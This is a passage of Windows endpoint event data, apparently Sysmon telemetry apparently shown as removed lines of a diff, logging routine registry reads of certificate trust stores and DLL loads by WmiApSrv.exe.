"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "WmiApSrv.exe", - "image_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "psapi.dll", - "image_path": "C:\\Windows\\System32\\psapi.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "image_load", - "image_name": "loadperf.dll", - "image_path": "C:\\Windows\\System32\\loadperf.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 